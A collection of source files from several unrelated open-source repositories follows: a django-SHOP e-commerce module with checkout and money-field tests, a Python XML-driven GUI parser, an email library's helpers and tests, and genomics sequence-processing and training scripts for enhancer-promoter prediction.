element.glossary['allow_use_shipping'] = element.glossary.get('allow_use_primary', '')
elif element.glossary['address_form'] == 'shipping':
element.plugin_type = 'ShippingAddressFormPlugin'
element.save()
class Migration(migrations.Migration):
dependencies = [
('shop', '0004_ckeditor31'),
]
operations = []
if 'cmsplugin_cascade' in settings.INSTALLED_APPS:
dependencies.append(('cmsplugin_cascade', '0017_fake_proxy_models'))
operations.append(migrations.RunPython(forwards, reverse_code=backwards))
```
#### File: shop/rest/renderers.py
```python
from rest_framework import renderers
from rest_framework.exceptions import APIException
from shop.models.cart import CartModel
from shop.serializers.cart import CartSerializer
class TemplateContextMixin:
"""
Alternative implementation which does not pollute the template context with
the serialized data on the root scope.
"""
def get_template_context(self, data, renderer_context):
response = renderer_context['response']
if response.exception:
return dict(data, status_code=response.status_code)
else:
view = renderer_context['view']
key = getattr(view, 'context_data_name', 'data')
return {key: data}
class ShopTemplateHTMLRenderer(TemplateContextMixin, renderers.TemplateHTMLRenderer):
"""
Modified TemplateHTMLRenderer, which shall be used to render templates used by django-SHOP.
Instead of polluting the template context with the serialized data, that information is
    stored inside a separate `data` attribute, which makes it possible to add a Cart and Paginator object.
Templates created for this renderer are compatible with the `CMSPageRenderer` (see below).
"""
def render(self, data, accepted_media_type=None, renderer_context=None):
request = renderer_context['request']
response = renderer_context['response']
if response.exception:
template = self.get_exception_template(response)
template_context = self.get_template_context(data, renderer_context)
return template.render(template_context)
view = renderer_context['view']
template_names = self.get_template_names(response, view)
template = self.resolve_template(template_names)
template_context = self.get_template_context(data, renderer_context)
self.update_with_cart_context(renderer_context)
template_context.update(renderer_context, paginator=view.paginator)
return template.render(template_context, request=request)
def update_with_cart_context(self, context):
try:
cart = CartModel.objects.get_from_request(context['request'])
context['is_cart_filled'] = cart.items.exists()
cart_serializer = CartSerializer(cart, context=context, label='cart')
context['cart'] = cart_serializer.data
except (KeyError, CartModel.DoesNotExist):
pass
class CMSPageRenderer(TemplateContextMixin, renderers.TemplateHTMLRenderer):
"""
Modified TemplateHTMLRenderer, which is able to render CMS pages containing the templatetag
``{% render_placeholder ... %}``, in addition to accept ordinary Python objects in their
rendering context.
The serialized data object, as available to other REST renderers, is explicitly added to the
context as ``data``. Therefore keep in mind that templates for REST's
:class:`rest_framework.renderers.TemplateHTMLRenderer` are not compatible with this renderer.
"""
def render(self, data, accepted_media_type=None, renderer_context=None):
renderer_context = renderer_context or {}
view = renderer_context['view']
request = renderer_context['request']
response = renderer_context['response']
if not getattr(request, 'current_page', None):
msg = "APIView class '{}' with 'renderer_class=(CMSPageRenderer, ...)' can only be used by a CMSApp"
response = view.handle_exception(APIException(detail=msg.format(view.__class__)))
if response.exception:
template = self.get_exception_template(response)
template_context = self.get_template_context(data, renderer_context)
return template.render(context=template_context, request=request)
# set edit_mode, so that otherwise invisible placeholders can be edited inline
edit_mode = getattr(request.current_page, 'publisher_is_draft', False)
template_names = [request.current_page.get_template()]
template = self.resolve_template(template_names)
template_context = self.get_template_context(data, renderer_context)
template_context.update(
renderer_context,
paginator=view.paginator,
edit_mode=edit_mode,
)
return template.render(template_context, request=request)
```
#### File: shop/search/mixins.py
```python
from django.utils.translation import get_language_from_request
from django_elasticsearch_dsl.registries import registry
from shop.models.product import ProductModel
class SearchViewMixin:
def get_document(self, language):
documents = registry.get_documents([ProductModel])
try:
return next(doc for doc in documents if doc._language == language)
except StopIteration:
return next(doc for doc in documents if doc._language is None)
class ProductSearchViewMixin(SearchViewMixin):
"""
Mixin class to be added to the ProductListView to restrict that list to entities matching
the query string.
"""
search_fields = ['product_name', 'product_code']
def get_renderer_context(self):
renderer_context = super().get_renderer_context()
if renderer_context['request'].accepted_renderer.format == 'html':
renderer_context['search_autocomplete'] = True
return renderer_context
def get_queryset(self):
query = self.request.GET.get('q')
if query:
language = get_language_from_request(self.request)
document = self.get_document(language)
search = document.search().source(excludes=['body'])
search = search.query('multi_match', query=query, fields=self.search_fields, type='bool_prefix')
queryset = search.to_queryset()
else:
queryset = super().get_queryset()
return queryset
class CatalogSearchViewMixin(SearchViewMixin):
"""
Mixin class to be added to the ProductListView in order to create a full-text search.
"""
search_fields = ['product_name', 'product_code', 'body']
def get_serializer(self, *args, **kwargs):
kwargs.setdefault('label', 'search')
return super().get_serializer(*args, **kwargs)
def get_queryset(self):
language = get_language_from_request(self.request)
document = self.get_document(language)
query = self.request.GET.get('q')
search = document.search().source(excludes=['body'])
if query:
search = search.query('multi_match', query=query, fields=self.search_fields)
return search.to_queryset()
```
#### File: TIDPP-Lab3/shop/signals.py
```python
try:
import redis
except ImportError:
redis = None
from django.conf import settings
from django.dispatch import Signal
customer_recognized = Signal(providing_args=['customer', 'request'])
if redis and hasattr(settings, 'SESSION_REDIS'):
redis_con = dict((key, settings.SESSION_REDIS[key]) for key in ['host', 'port', 'db', 'socket_timeout'])
pool = redis.ConnectionPool(**redis_con)
redis_con = redis.Redis(connection_pool=pool)
else:
redis_con = type(str('Redis'), (), {'publish': lambda *args: None})()
def email_queued():
"""
    If SESSION_REDIS is configured, inform a separately running worker engine that
    emails are ready for delivery. Call this function every time an email has been
    handed over to the Post-Office.
"""
redis_con.publish('django-SHOP', 'send_queued_mail')
```
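`email_queued()` does nothing more than publish a `send_queued_mail` message on the `django-SHOP` channel (or silently no-op when redis or `SESSION_REDIS` is unavailable). A hedged sketch of what a consumer on the other side of that channel could look like; the host, port, and the reaction to the message are assumptions, not part of django-SHOP:

```python
import redis

# Hypothetical worker: listen on the channel used by email_queued() and react to notifications.
connection = redis.Redis(host='localhost', port=6379, db=0)
pubsub = connection.pubsub()
pubsub.subscribe('django-SHOP')

for message in pubsub.listen():
    if message['type'] == 'message' and message['data'] == b'send_queued_mail':
        # A real worker would trigger the actual mail delivery here.
        print("email queue flush requested")
        break
```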
#### File: TIDPP-Lab3/tests/test_checkout.py
```python
import pytest
from shop.forms.checkout import ShippingAddressForm
from shop.views.address import AddressEditView
from shop.views.checkout import CheckoutViewSet
@pytest.mark.django_db
def test_customer_form(registered_customer, api_rf, empty_cart):
data = {
'customer': {
'salutation': "mr",
'first_name': "John",
'last_name': "Doe",
'email': "<EMAIL>",
'plugin_id': "1",
'plugin_order': "1",
},
}
request = api_rf.put('/shop/api/checkout/upload', data, format='json')
request.customer = registered_customer
response = CheckoutViewSet.as_view({'put': 'upload'})(request)
assert response.status_code == 200
assert registered_customer.salutation == data['customer']['salutation']
assert registered_customer.first_name == data['customer']['first_name']
assert registered_customer.last_name == data['customer']['last_name']
assert registered_customer.email == data['customer']['email']
@pytest.fixture
def address_data():
return {
'name': "<NAME>",
'address1': "31 Orwell Road",
'zip_code': "L41RG",
'city': "Liverpool",
'country': "GB",
'plugin_id': "1",
'plugin_order': "1",
}
@pytest.mark.django_db
def test_new_shipping_address(registered_customer, api_rf, empty_cart):
"""
Check that clicking on the "Add new address" returns an empty address form.
"""
request = api_rf.get('/shop/api/shipping_address/add')
request.customer = registered_customer
request.user = registered_customer.user
response = AddressEditView.as_view(form_class=ShippingAddressForm)(request, priority='add')
assert response.status_code == 200
assert response.data['shipping_address_form']['name'] is None
assert response.data['shipping_address_form']['address1'] is None
assert response.data['shipping_address_form']['zip_code'] is None
assert response.data['shipping_address_form']['city'] is None
assert response.data['shipping_address_form']['country'] is None
@pytest.mark.django_db
def test_add_shipping_address(registered_customer, api_rf, empty_cart, address_data):
data = dict(shipping_address=address_data, active_priority='add')
request = api_rf.put('/shop/api/checkout/upload', data, format='json')
request.customer = registered_customer
request.user = registered_customer.user
assert registered_customer.shippingaddress_set.count() == 0
assert registered_customer.billingaddress_set.count() == 0
response = CheckoutViewSet.as_view({'put': 'upload'})(request)
assert response.status_code == 200
assert response.data['shipping_address_form']['name'] == address_data['name']
label = "1. <NAME> – 31 Orwell Road – L41RG Liverpool – United Kingdom"
assert response.data['shipping_address_form']['siblings_summary'][0]['label'] == label
registered_customer.refresh_from_db()
assert registered_customer.billingaddress_set.count() == 0
shipping_address = registered_customer.shippingaddress_set.first()
assert shipping_address
assert shipping_address.name == address_data['name']
assert shipping_address.address1 == address_data['address1']
assert shipping_address.zip_code == address_data['zip_code']
assert shipping_address.city == address_data['city']
assert shipping_address.country == address_data['country']
@pytest.mark.django_db
def test_delete_shipping_address(registered_customer, api_rf, empty_cart, shipping_address_factory):
assert registered_customer.shippingaddress_set.count() == 0
registered_customer.shippingaddress_set.add(shipping_address_factory.create(customer=registered_customer))
registered_customer.shippingaddress_set.add(shipping_address_factory.create(customer=registered_customer))
assert registered_customer.shippingaddress_set.count() == 2
first_priority = registered_customer.shippingaddress_set.first().priority
last_priority = registered_customer.shippingaddress_set.last().priority
assert first_priority != last_priority
request = api_rf.delete('/shop/api/shipping_address/1')
request.customer = registered_customer
request.user = registered_customer.user
response = AddressEditView.as_view(form_class=ShippingAddressForm)(request, priority=first_priority)
assert response.status_code == 200
assert registered_customer.shippingaddress_set.count() == 1
assert registered_customer.shippingaddress_set.first().priority == last_priority
@pytest.mark.django_db
def test_delete_last_shipping_address(registered_customer, api_rf, empty_cart, shipping_address_factory):
registered_customer.shippingaddress_set.add(shipping_address_factory.create(customer=registered_customer))
assert registered_customer.shippingaddress_set.count() == 1
request = api_rf.delete('/shop/api/shipping_address/1')
request.customer = registered_customer
request.user = registered_customer.user
priority = registered_customer.shippingaddress_set.first().priority
response = AddressEditView.as_view(form_class=ShippingAddressForm)(request, priority=priority)
assert response.status_code == 410
assert registered_customer.shippingaddress_set.count() == 0
@pytest.mark.django_db
def test_change_shipping_address(registered_customer, api_rf, empty_cart, address_data):
data = dict(shipping_address=address_data, active_priotity=1)
request = api_rf.put('/shop/api/checkout/upload', data, format='json')
request.customer = registered_customer
response = CheckoutViewSet.as_view({'put': 'upload'})(request)
assert response.status_code == 200
shipping_address = registered_customer.shippingaddress_set.first()
assert shipping_address.id == registered_customer.cart.shipping_address.id
assert shipping_address.name == address_data['name']
assert shipping_address.address1 == address_data['address1']
assert shipping_address.zip_code == address_data['zip_code']
assert shipping_address.city == address_data['city']
assert shipping_address.country == address_data['country']
assert registered_customer.billingaddress_set.first() is None
@pytest.mark.django_db
def test_select_shipping_address(registered_customer, api_rf, empty_cart, shipping_address_factory):
assert registered_customer.shippingaddress_set.count() == 0
address1 = shipping_address_factory.create(customer=registered_customer)
registered_customer.shippingaddress_set.add(address1)
address2 = shipping_address_factory.create(customer=registered_customer)
registered_customer.shippingaddress_set.add(address2)
assert registered_customer.shippingaddress_set.count() == 2
first_priority = registered_customer.shippingaddress_set.first().priority
last_priority = registered_customer.shippingaddress_set.last().priority
assert first_priority != last_priority
request = api_rf.get('/shop/api/shipping_address/0')
request.customer = registered_customer
request.user = registered_customer.user
response = AddressEditView.as_view(form_class=ShippingAddressForm)(request, priority=first_priority)
assert response.status_code == 200
assert response.data['shipping_address_form']['name'] == address1.name
assert response.data['shipping_address_form']['address1'] == address1.address1
assert response.data['shipping_address_form']['zip_code'] == address1.zip_code
assert response.data['shipping_address_form']['city'] == address1.city
assert response.data['shipping_address_form']['country'] == address1.country
data = dict(shipping_address=response.data['shipping_address_form'])
data['shipping_address']['plugin_order'] = 1
request = api_rf.put('/shop/api/shipping_address/0', data, format='json')
request.customer = registered_customer
request.user = registered_customer.user
response = AddressEditView.as_view(form_class=ShippingAddressForm)(request)
assert response.status_code == 200
@pytest.mark.django_db
def test_use_shipping_address_for_billing(registered_customer, api_rf, empty_cart, address_data):
data = {
'shipping_address': dict(address_data, plugin_order=1, active_priority='add'),
'billing_address': {
'active_priority': 'add',
'use_primary_address': True,
'plugin_order': 2,
},
}
request = api_rf.put('/shop/api/checkout/upload', data, format='json')
request.customer = registered_customer
response = CheckoutViewSet.as_view({'put': 'upload'})(request)
assert response.status_code == 200
shipping_address = registered_customer.shippingaddress_set.first()
assert shipping_address is not None
billing_address = registered_customer.billingaddress_set.first()
assert billing_address is None
request = api_rf.get('/shop/api/checkout/digest')
request.customer = registered_customer
response = CheckoutViewSet.as_view({'get': 'digest'})(request)
assert response.status_code == 200
assert response.data['checkout_digest']['billing_address_tag'] == "Use shipping address for billing"
```
#### File: TIDPP-Lab3/tests/test_enum.py
```python
import pytest
from django.db import models
from shop.models.fields import ChoiceEnum, ChoiceEnumField
class MyChoices(ChoiceEnum):
A = 0, "My choice A"
B = 1, "My choice B"
class MyColor(ChoiceEnum):
RED = '#ff0000', "Pure red"
BLUE = '#0000ff', "Pure blue"
class MyModel(models.Model):
f = ChoiceEnumField(enum_type=MyChoices)
class Meta:
app_label = 'shop'
managed = False
def test_int_enum():
choice_a = MyChoices.A
assert isinstance(choice_a, MyChoices)
assert MyChoices.B.name == 'B'
assert MyChoices.B.value == 1
assert MyChoices.B.label == "My choice B"
choice_b = MyChoices('B')
assert str(choice_b) == "My choice B"
assert MyChoices.default == MyChoices.A
assert MyChoices.choices == [(0, "My choice A"), (1, "My choice B")]
def test_str_enum():
red = MyColor.RED
assert isinstance(red, MyColor)
assert MyColor.BLUE.name == 'BLUE'
assert MyColor.BLUE.value == '#0000ff'
assert MyColor.BLUE.label == "Pure blue"
assert MyColor.BLUE == MyColor('#0000ff')
assert str(MyColor.BLUE) == "Pure blue"
assert MyColor.choices == [('#ff0000', "Pure red"), ('#0000ff', "Pure blue")]
def test_to_python():
f = ChoiceEnumField(enum_type=MyChoices)
assert f.to_python(0) == MyChoices.A
assert f.to_python('A') == MyChoices.A
assert f.to_python(1) == MyChoices.B
with pytest.raises(ValueError):
f.to_python(None)
with pytest.raises(ValueError):
f.to_python(3)
def test_deconstruct():
f = ChoiceEnumField(enum_type=MyChoices)
name, path, args_, kwargs_ = f.deconstruct()
assert name is None
assert path == 'shop.models.fields.ChoiceEnumField'
assert args_ == []
assert kwargs_ == {}
def test_from_db_value():
f = ChoiceEnumField(enum_type=MyChoices)
assert f.from_db_value(0, None, None) is MyChoices.A
assert f.from_db_value(1, None, None) is MyChoices.B
assert f.from_db_value(2, None, None) is 2
def test_get_prep_value():
f = ChoiceEnumField(enum_type=MyChoices)
assert f.get_prep_value(MyChoices.A) is 0
assert f.get_prep_value(MyChoices.B) is 1
def test_value_to_string():
obj = MyModel(f=MyChoices.A)
assert ChoiceEnumField(name='f').value_to_string(obj) == 'A'
with pytest.raises(ValueError):
ChoiceEnumField(name='f').value_to_string(0)
```
#### File: TIDPP-Lab3/tests/test_money_db_field.py
```python
import pytest
from decimal import Decimal
from django.core.exceptions import ValidationError
from shop.money.money_maker import MoneyMaker
from shop.money.fields import MoneyField
EUR = MoneyMaker('EUR')
def test_deconstruct():
f1 = MoneyField(currency='EUR', default=EUR(0))
name, path, args, kwargs = f1.deconstruct()
f2 = MoneyField(*args, **kwargs)
assert f1.currency_code == f2.currency_code
assert f1.decimal_places == f2.decimal_places
assert f1.default == f2.default
def test_to_python():
f = MoneyField(currency='EUR', null=True)
assert f.to_python(3) == EUR('3')
assert f.to_python('3.14') == EUR('3.14')
assert f.to_python(None) == EUR()
assert f.to_python(EUR(3)) == EUR('3')
with pytest.raises(ValidationError):
f.to_python('abc')
def test_get_prep_value():
f = MoneyField(currency='EUR', null=True)
assert f.get_prep_value(EUR('3')) == Decimal('3')
def test_from_db_value():
f = MoneyField(currency='EUR', null=True)
assert f.from_db_value(Decimal('3'), None, None) == EUR('3')
assert f.from_db_value(3.45, None, None) == EUR('3.45')
assert f.from_db_value(None, None, None) is None
def test_get_default():
OneEuro = EUR(1)
f = MoneyField(currency='EUR', null=True)
assert f.get_default() is None
f = MoneyField(currency='EUR', null=True, default=EUR())
assert f.get_default() == EUR()
f = MoneyField(currency='EUR', null=False, default=OneEuro)
assert f.get_default() == OneEuro
```
#### File: tests/testshop/modifiers.py
```python
from shop.payment.modifiers import PayInAdvanceModifier
from django.utils.translation import gettext_lazy as _
class ComplexPayInAdvanceModifier(PayInAdvanceModifier):
identifier = "complex-pay-in-advance-modifier"
def get_choice(self):
return (self.identifier, _("Pay in advance with complex payment system X"))
``` |
{
"source": "2000jedi/WebViewer",
"score": 2
} |
#### File: WebViewer/Python/main.py
```python
from sys import stderr
from os.path import join, curdir
from importlib import reload  # reload() is not a builtin in Python 3
import parser
import globals
import application
reload(parser)
reload(application)
def main(app_name):
app_path = join(curdir, app_name)
xml_path = join(app_path, 'view.xml')
views = parser.parse_xml(xml_path)
try:
globals.app = __import__(app_name + '.extensions', fromlist=[app_name])
except ImportError as e:
        stderr.write(str(e) + '\n')  # ImportError has no .message attribute in Python 3
return
main_window = application.Application(views[0], views[1])
globals.views = main_window.extensions
main_window.start(views[2])
main('test')
```
#### File: WebViewer/Python/parser.py
```python
from xml.dom.minidom import parse
class Extension:
def __init__(self, exttype, name, position):
self.type = exttype
self.name = name
self.position = [int(i) for i in position.split(',')]
self.content = None
def __repr__(self):
return "%s(%s)" % (self.name, self.type)
def __str__(self):
return "%s(%s)" % (self.name, self.type)
def set_content(self, content):
self.content = content
class Framework:
def __init__(self, name, exttype, sub_framework, sub_extension, params, position):
self.name = name
self.type = exttype
self.subFramework = sub_framework
self.subExtension = sub_extension
self.params = [int(i) for i in str(params).split(',')]
self.position = [int(i) for i in position.split(',')]
def __repr__(self):
return "%s(%s)" % (self.name, self.type)
def __str__(self):
return "%s(%s)" % (self.name, self.type)
def get_text(leaf):
nodelist = leaf.childNodes
rc = []
for node in nodelist:
if node.nodeType == node.TEXT_NODE:
rc.append(node.data)
return ''.join(rc)
def tag_exist(xml, tag, default):
    return get_text(xml.getElementsByTagName(tag)[0]) if len(xml.getElementsByTagName(tag)) == 1 else default  # get_text() extracts the tag's text; str() on a DOM element would only return its repr
def specified_extension(ext, ext_type):
if ext_type == 'button':
return {
'text': get_text(ext.getElementsByTagName('text')[0])
}
if ext_type == 'label':
return {
'text': get_text(ext.getElementsByTagName('text')[0]),
'font_size': int(tag_exist(ext, 'font_size', 12))
}
if ext_type == 'text':
return {
'default': tag_exist(ext, 'default_text', ''),
'font_size': int(tag_exist(ext, 'font_size', 12))
}
if ext_type == 'pic':
return {
'image': get_text(ext.getElementsByTagName('path')[0])
}
if ext_type == 'list':
return {
'default-items': tag_exist(ext, 'default-items', '')
}
if ext_type == 'check':
return {
'default': tag_exist(ext, 'default', 'true') == 'true'
}
if ext_type == 'input':
return {
'active': tag_exist(ext, 'default', 'true') == 'true'
}
def walk(framework):
raw_frameworks = framework.getElementsByTagName('framework')
frameworks = []
for frm in raw_frameworks:
frameworks.append(walk(frm))
raw_extensions = framework.getElementsByTagName('extension')
extensions = []
for ext in raw_extensions:
ext_ = Extension(exttype=str(ext.getAttribute('type')), name=str(ext.getAttribute('name')), position=get_text(ext.getElementsByTagName('position')[0]))
ext_.set_content(specified_extension(ext, ext_.type))
extensions.append(ext_)
return Framework(framework.getAttribute('name'), framework.getAttribute('type'), frameworks, extensions, framework.getAttribute('params'), [int(i) for i in tag_exist(framework, 'position', '-1').split(',')])
def parse_xml(xml_path):
dom_tree = parse(xml_path)
elements = dom_tree.documentElement
if not elements.hasAttribute('appname') or not elements.hasAttribute('size'):
raise Exception("XML file corrupted")
title = elements.getAttribute('appname')
size = str(elements.getAttribute('size')).split('X')
raw_framework = elements.getElementsByTagName('framework')[0]
main_framework = walk(raw_framework)
return title, size, main_framework
```
#### File: Python/test/extensions.py
```python
from Python import web
def testbutton_onclick(extension, views):
class get_(web.Get):
def after_completed(self):
self.after_complete_param.set_label(self.result)
display = views['display']
get_('http://www.bilibili.com/', after_complete=display).get()
functions = {
'testbutton': {'clicked': testbutton_onclick}
}
``` |
{
"source": "2000prath/mailie",
"score": 2
} |
#### File: mailie/mailie/_auth.py
```python
class Auth:
"""
Base class for authentication schemes.
"""
def auth(self):
...
def synchronous_auth(self):
...
async def asynchronous_auth(self):
...
```
#### File: mailie/mailie/_policy.py
```python
import typing
from email.policy import HTTP
from email.policy import SMTP
from email.policy import SMTPUTF8
from email.policy import Policy
from email.policy import default
from email.policy import strict
POLICIES = {"default": default, "strict": strict, "smtp": SMTP, "smtputf8": SMTPUTF8, "http": HTTP}
def policy_factory(policy_type: typing.Union[str, Policy] = "smtp") -> Policy:
"""
Returns an immutable email policy instance based on the policy_type.
:param policy_type: The policy type to perform the lookup for, if policy_type is a Policy, it is returned
otherwise an unknown policy will assume the `SMTP` default.
:returns: The `EmailPolicy` instance.
"""
if isinstance(policy_type, Policy):
return policy_type
return POLICIES.get(policy_type.lower(), default)
```
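A short usage sketch of `policy_factory`: string lookups are case-insensitive, unknown names fall back to the stdlib `default` policy, and an actual `Policy` instance is passed through untouched (the import path below is assumed):

```python
from email.policy import SMTP, default
from mailie._policy import policy_factory  # assumed import path

assert policy_factory("SMTP") is SMTP               # case-insensitive lookup
assert policy_factory("no-such-policy") is default  # unknown names fall back to the default policy
assert policy_factory(SMTP) is SMTP                 # a Policy instance is returned unchanged
```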
#### File: mailie/mailie/_request.py
```python
import typing
from ._email import Email
from ._types import Auth
class Request:
def __init__(self, *, email: Email, auth: typing.Optional[Auth] = None):
self.email = email
self.auth = auth
```
#### File: mailie/mailie/_utility.py
```python
import csv
import pathlib
import typing
from ._types import EMAIL_HEADER_TYPES
from ._types import EMAIL_ITERABLE_ALIAS
def split_headers_per_rfc(
header_data: typing.Optional[typing.Iterable[str]] = None, delimiter: str = ":"
) -> typing.List[typing.List[str]]:
"""
Given an iterable of RFC compliant header strings, convert them into tuples of header field:header value pairs
ready for use within a `mailie.Email` instance. By default using the RFC compliant colon delimiter.
"""
if header_data is None:
return []
return [header.rsplit(delimiter, maxsplit=1) for header in header_data]
def emails_to_list(emails: typing.Optional[EMAIL_ITERABLE_ALIAS] = None) -> typing.List[str]:
"""
Given a single email address, or an iterable of emails, returns
    distinct email addresses in a new list. If emails is not provided,
an empty list is returned.
:param emails: A single email address or iterable of emails.
"""
if emails is None:
return []
return [emails] if isinstance(emails, str) else [email for email in set(emails)]
def headers_to_list(headers: EMAIL_HEADER_TYPES = None) -> typing.List[str]:
"""
Converts the user defined headers into an RFC compliant list, offers slightly more functionality to the
user while guaranteeing the internal API is consistent.
"""
if headers is None:
return []
if isinstance(headers, typing.MutableMapping):
return [f"{key}:{value}" for key, value in headers.items()]
return list(headers)
def check_is_email(email: str):
# TODO: Validate valid emails here - easier said than done me thinks;
...
def unpack_recipients_from_csv(recipient_or_path: str) -> typing.List[str]:
"""
Given a valid path to a `.csv` file containing recipient data; parse the
file and generate a list of recipient email addresses. If the recipient
is not a valid path, it is treated as an actual email address and added
to the results.
# Todo: Treating non files as email addresses seems a little odd.
"""
results = []
recipient_or_path = recipient_or_path.strip()
path = pathlib.Path(recipient_or_path)
if path.is_file():
with open(path, newline="") as file:
email_reader = csv.reader(file, delimiter=",")
for row in email_reader:
for item in row:
results.append(item)
else:
results.append(recipient_or_path)
return results
```
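A few usage sketches for the helpers above (the import path is assumed to be `mailie._utility`):

```python
from mailie._utility import emails_to_list, headers_to_list, split_headers_per_rfc  # assumed import path

assert emails_to_list(None) == []
assert emails_to_list("one@example.com") == ["one@example.com"]
assert headers_to_list({"Subject": "Hi", "X-Tag": "42"}) == ["Subject:Hi", "X-Tag:42"]
assert split_headers_per_rfc(["Subject:Hi"]) == [["Subject", "Hi"]]
```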
#### File: tests/cli/test_help.py
```python
def test_version_execution(run_mailie):
result = run_mailie("--help")
assert result.exit_code == 0
assert "--show-completion" in result.output
```
#### File: tests/cli/test_version.py
```python
from mailie import version
def test_dash_dash_versions(run_mailie):
result = run_mailie("--version")
assert result.exit_code == 0
assert f"Mailie version: {version}\n" == result.output
```
#### File: core/unit/test_headers.py
```python
from mailie import Email
def test_subject_via_list_in_headers() -> None:
email = Email(mail_from="<EMAIL>", rcpt_to="<EMAIL>", headers=["Subject:AsList"])
assert email["Subject"] == "AsList"
def test_subject_via_mapping_in_headers() -> None:
email = Email(mail_from="<EMAIL>", rcpt_to="<EMAIL>", headers={"Subject": "AsList"})
assert email["Subject"] == "AsList"
def test_subject_as_subject_kwarg() -> None:
email = Email(mail_from="<EMAIL>", rcpt_to="<EMAIL>", subject="KeywordArg")
assert email["Subject"] == "KeywordArg"
``` |
{
"source": "20032303092/StackEPI",
"score": 3
} |
#### File: StackEPI/EPIVAN/sequence_processing.py
```python
import itertools
import numpy as np
from keras.preprocessing.text import Tokenizer
from keras.preprocessing.sequence import pad_sequences
def sentence2word(str_set):
word_seq = []
for sr in str_set:
tmp = []
for i in range(len(sr) - 5):
if ('N' in sr[i:i + 6]):
tmp.append('null')
else:
tmp.append(sr[i:i + 6])
word_seq.append(' '.join(tmp))
return word_seq
def word2num(wordseq, tokenizer, MAX_LEN):
sequences = tokenizer.texts_to_sequences(wordseq)
numseq = pad_sequences(sequences, maxlen=MAX_LEN)
return numseq
def sentence2num(str_set, tokenizer, MAX_LEN):
wordseq = sentence2word(str_set)
numseq = word2num(wordseq, tokenizer, MAX_LEN)
return numseq
def get_tokenizer():
f = ['a', 'c', 'g', 't']
c = itertools.product(f, f, f, f, f, f)
res = []
for i in c:
temp = i[0] + i[1] + i[2] + i[3] + i[4] + i[5]
res.append(temp)
res = np.array(res)
NB_WORDS = 4097
tokenizer = Tokenizer(num_words=NB_WORDS)
tokenizer.fit_on_texts(res)
acgt_index = tokenizer.word_index
acgt_index['null'] = 0
return tokenizer
def get_data(enhancers, promoters):
tokenizer = get_tokenizer()
MAX_LEN = 3000
X_en = sentence2num(enhancers, tokenizer, MAX_LEN)
MAX_LEN = 2000
X_pr = sentence2num(promoters, tokenizer, MAX_LEN)
return X_en, X_pr
# In[]:
names = ['GM12878', 'HUVEC', 'HeLa-S3', 'IMR90', 'K562', 'NHEK']
name = names[5]
train_dir = 'data/%s/train/' % name
imbltrain = 'data/%s/imbltrain/' % name
test_dir = 'data/%s/test/' % name
Data_dir = 'data/%s/' % name
print('Experiment on %s dataset' % name)
print('Loading seq data...')
enhancers_tra = open(train_dir + '%s_enhancer.fasta' % name, 'r').read().splitlines()[1::2]
promoters_tra = open(train_dir + '%s_promoter.fasta' % name, 'r').read().splitlines()[1::2]
y_tra = np.loadtxt(train_dir + '%s_label.txt' % name)
im_enhancers_tra = open(imbltrain + '%s_enhancer.fasta' % name, 'r').read().splitlines()[1::2]
im_promoters_tra = open(imbltrain + '%s_promoter.fasta' % name, 'r').read().splitlines()[1::2]
y_imtra = np.loadtxt(imbltrain + '%s_label.txt' % name)
enhancers_tes = open(test_dir + '%s_enhancer_test.fasta' % name, 'r').read().splitlines()[1::2]
promoters_tes = open(test_dir + '%s_promoter_test.fasta' % name, 'r').read().splitlines()[1::2]
y_tes = np.loadtxt(test_dir + '%s_label_test.txt' % name)
print('Balanced training set')
print('pos_samples:' + str(int(sum(y_tra))))
print('neg_samples:' + str(len(y_tra) - int(sum(y_tra))))
print('Imbalanced training set')
print('pos_samples:' + str(int(sum(y_imtra))))
print('neg_samples:' + str(len(y_imtra) - int(sum(y_imtra))))
print('Test set')
print('pos_samples:' + str(int(sum(y_tes))))
print('neg_samples:' + str(len(y_tes) - int(sum(y_tes))))
# In[ ]:
X_en_tra, X_pr_tra = get_data(enhancers_tra, promoters_tra)
X_en_imtra, X_pr_imtra = get_data(im_enhancers_tra, im_promoters_tra)
X_en_tes, X_pr_tes = get_data(enhancers_tes, promoters_tes)
np.savez(Data_dir + '%s_train.npz' % name, X_en_tra=X_en_tra, X_pr_tra=X_pr_tra, y_tra=y_tra)
np.savez(Data_dir + 'im_%s_train.npz' % name, X_en_tra=X_en_imtra, X_pr_tra=X_pr_imtra, y_tra=y_imtra)
np.savez(Data_dir + '%s_test.npz' % name, X_en_tes=X_en_tes, X_pr_tes=X_pr_tes, y_tes=y_tes)
print("save over")
```
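`sentence2word` slides a six-nucleotide window over every sequence, emitting `'null'` for any window containing `N`, and `get_data` then encodes those 6-mers with a tokenizer fitted on all 4096 possible words. A standalone sketch of just the sliding-window split, without Keras:

```python
def to_kmers(seq, k=6):
    # Same sliding-window logic as sentence2word, for a single sequence.
    return ['null' if 'N' in seq[i:i + k] else seq[i:i + k] for i in range(len(seq) - k + 1)]

print(to_kmers("ACGTACGT"))  # ['ACGTAC', 'CGTACG', 'GTACGT']
print(to_kmers("ACGNACGT"))  # ['null', 'null', 'null'] - every window overlaps the N
```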
#### File: StackEPI/EPIVAN/train-for.py
```python
import math
import os
import time
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
from model import get_model
import numpy as np
from keras.callbacks import Callback
from datetime import datetime
from sklearn.metrics import roc_auc_score, average_precision_score
from sklearn.model_selection import train_test_split
def time_since(start):
s = time.time() - start
# s = 62 - start
m = math.floor(s / 60)
s -= m * 60
h = math.floor(m / 60)
m -= h * 60
return '%dh %dm %ds' % (h, m, s)
class roc_callback(Callback):
def __init__(self, val_data, name):
self.en = val_data[0]
self.pr = val_data[1]
self.y = val_data[2]
self.name = name
def on_train_begin(self, logs={}):
return
def on_train_end(self, logs={}):
return
def on_epoch_begin(self, epoch, logs={}):
return
def on_epoch_end(self, epoch, logs={}):
y_pred = self.model.predict([self.en, self.pr])
auc_val = roc_auc_score(self.y, y_pred)
aupr_val = average_precision_score(self.y, y_pred)
self.model.save_weights("./model/specificModel/%sModel%d.h5" % (self.name, epoch))
print('\r auc_val: %s ' % str(round(auc_val, 4)), end=100 * ' ' + '\n')
print('\r aupr_val: %s ' % str(round(aupr_val, 4)), end=100 * ' ' + '\n')
return
def on_batch_begin(self, batch, logs={}):
return
def on_batch_end(self, batch, logs={}):
return
# names = ['HUVEC', 'HeLa-S3', 'K562', 'NHEK', 'all', 'all-NHEK']
msgs = []
names = ['GM12878', 'HUVEC', 'HeLa-S3', 'IMR90', 'K562', 'NHEK']
for name in names:
start = time.time()
t1 = datetime.now().strftime('%Y-%m-%d-%H:%M:%S')
# The data used here is the sequence processed by data_processing.py.
